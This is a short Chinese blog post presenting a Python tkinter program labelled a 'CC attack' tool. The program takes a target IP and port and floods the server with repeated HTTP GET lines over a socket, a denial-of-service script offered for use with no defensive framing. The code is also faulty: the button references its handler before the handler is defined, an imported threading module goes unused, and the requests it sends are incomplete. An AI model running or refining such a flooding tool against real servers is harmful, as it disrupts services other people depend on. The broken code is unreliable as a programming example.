当前位置:   article > 正文

一不小心写了个cc攻击脚本

cc攻击脚本
  1. import socket
  2. import threading
  3. import tkinter
  4. # 创建图形化界面
  5. root = tkinter.Tk()
  6. root.title("CC Attack")
  7. root.geometry("500x500")
  8. # 设置服务器IP和端口号
  9. ip_str = tkinter.StringVar()
  10. port_str = tkinter.StringVar()
  11. # 创建服务器IP和端口号输入框
  12. ip_label = tkinter.Label(root, text="Server IP:")
  13. ip_entry = tkinter.Entry(root, textvariable=ip_str)
  14. port_label = tkinter.Label(root, text="Port:")
  15. port_entry = tkinter.Entry(root, textvariable=port_str)
  16. # 创建攻击按钮
  17. attack_btn = tkinter.Button(root, text="Attack", command=attack_btn_click)
  18. # 攻击函数
  19. def attack_btn_click():
  20. ip = ip_str.get()
  21. port = int(port_str.get())
  22. # 创建socket
  23. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  24. # 发送攻击请求
  25. sock.connect((ip, port))
  26. while True:
  27. sock.send("GET / HTTP/1.1\r\n".encode("utf-8"))
  28. # 将组件放置到界面上
  29. ip_label.pack()
  30. ip_entry.pack()
  31. port_label.pack()
  32. port_entry.pack()
  33. attack_btn.pack()
  34. # 运行主程序
  35. root.mainloop()

意思都写在上面了,是有图形化界面的

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/896121
推荐阅读
相关标签
  

闽ICP备14008679号